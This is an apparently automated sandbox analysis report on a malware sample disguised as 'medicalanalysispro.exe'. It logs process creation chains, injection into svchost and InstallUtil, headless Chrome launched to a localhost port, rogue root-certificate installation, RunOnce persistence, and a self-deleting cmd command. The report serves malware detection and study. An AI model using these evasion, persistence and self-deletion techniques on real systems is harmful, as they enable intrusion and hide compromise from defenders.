                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 324
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr7A3F.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/299e36a8/4a1b3c1a"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=1988,i,17588482768743523703,9612688195532631865,262144 /prefetch:8
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe"
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeJump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr7A3F.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/299e36a8/4a1b3c1a"Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe"Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=1988,i,17588482768743523703,9612688195532631865,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeSection loaded: feclient.dllJump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeSection loaded: advpack.dllJump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: esdsip.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ncryptprov.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmprph.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmprph.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmprph.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: medicalanalysispro.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: medicalanalysispro.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: medicalanalysispro.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: medicalanalysispro.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: medicalanalysispro.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: medicalanalysispro.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: medicalanalysispro.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: medicalanalysispro.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: medicalanalysispro.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wextract.pdb source: medicalanalysispro.exe
                      Source: Binary string: wextract.pdbGCTL source: medicalanalysispro.exe
                      Source: Binary string: wkernel32.pdb source: svchost.exe, 00000007.00000003.2233297318.0000000005400000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2233110794.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000007.00000003.2242940792.0000000005500000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2234168515.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: medicalanalysis.exe, 00000001.00000002.2227832328.0000000005680000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.0000000003439000.00000004.00000800.00020000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.00000000033E8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: svchost.exe, 00000007.00000003.2230273318.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2229865266.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000007.00000003.2232472800.0000000005480000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2231661121.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: svchost.exe, 00000007.00000003.2230273318.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2229865266.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: medicalanalysis.exe, medicalanalysis.exe, 00000001.00000002.2227832328.0000000005680000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.0000000003439000.00000004.00000800.00020000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.00000000033E8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: svchost.exe, 00000007.00000003.2232472800.0000000005480000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2231661121.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdb source: wmprph.exe, 00000015.00000003.2651124820.00000242C8ED0000.00000004.00000001.00020000.00000000.sdmp, wmprph.exe, 00000015.00000003.2651176704.00000242C8F00000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000007.00000003.2242940792.0000000005500000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2234168515.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: svchost.exe, 00000007.00000003.2233297318.0000000005400000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2233110794.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdbGCTL source: wmprph.exe, 00000015.00000003.2651124820.00000242C8ED0000.00000004.00000001.00020000.00000000.sdmp, wmprph.exe, 00000015.00000003.2651176704.00000242C8F00000.00000004.00000001.00020000.00000000.sdmp
                      Source: medicalanalysispro.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: medicalanalysispro.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: medicalanalysispro.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: medicalanalysispro.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: medicalanalysispro.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 1.2.medicalanalysis.exe.33e9550.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.medicalanalysis.exe.33e9550.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.medicalanalysis.exe.33e9550.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 1.2.medicalanalysis.exe.5680000.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.medicalanalysis.exe.5680000.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.medicalanalysis.exe.5680000.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 1.2.medicalanalysis.exe.58e0000.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 1.2.medicalanalysis.exe.58e0000.7.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 1.2.medicalanalysis.exe.58e0000.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 1.2.medicalanalysis.exe.58e0000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 1.2.medicalanalysis.exe.58e0000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 1.2.medicalanalysis.exe.5840000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.2218187485.0000000002427000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2229000559.0000000005840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: medicalanalysis.exe PID: 3756, type: MEMORYSTR
                      Source: medicalanalysispro.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE730EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7BDE730EC
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_054B58BA push 00000028h; retf 1_2_054B597C
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_054B57BD push 00000028h; retf 1_2_054B57DB
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_054B56D3 push 00000028h; retf 1_2_054B56D5
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_054B5AD5 push 00000028h; retf 1_2_054B5AFC
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_021B6E00 push esp; retf 1_2_021B6E01
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_021B75F8 pushad ; ret 1_2_021B75FE
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_05751913 push eax; ret 1_2_0575191D
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_057C1766 push ss; ret 1_2_057C1767
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 1_2_05C270BC pushfd ; ret 1_2_05C270C1
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B758BC pushad ; ret 7_3_02B758C1
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B7588E push eax; iretd 7_3_02B7589D
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B728ED push ebx; ret 7_3_02B728E4
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B718C0 push ebp; retf 7_3_02B718C1
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B76012 push 00000038h; iretd 7_3_02B7601D
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B75606 pushad ; retf 7_3_02B75619
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B7225D push eax; ret 7_3_02B7225F
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B7278B push ebx; ret 7_3_02B728E4
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B75FEE push FFFFFFD2h; retf 7_3_02B76011
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B70FEA push eax; ret 7_3_02B70FF5
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B74920 push 0000002Eh; iretd 7_3_02B74922
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B75F0C push es; iretd 7_3_02B75F0D
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B71179 push FFFFFF82h; iretd 7_3_02B7117B

                      Persistence and Installation Behavior

                      barindex
                      Installs new ROOT certificates
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BFC5FBF042F25A0BCAF8B7C2544DA203DF898B12 BlobJump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeJump to dropped file
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeJump to dropped file
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE71684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF7BDE71684
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
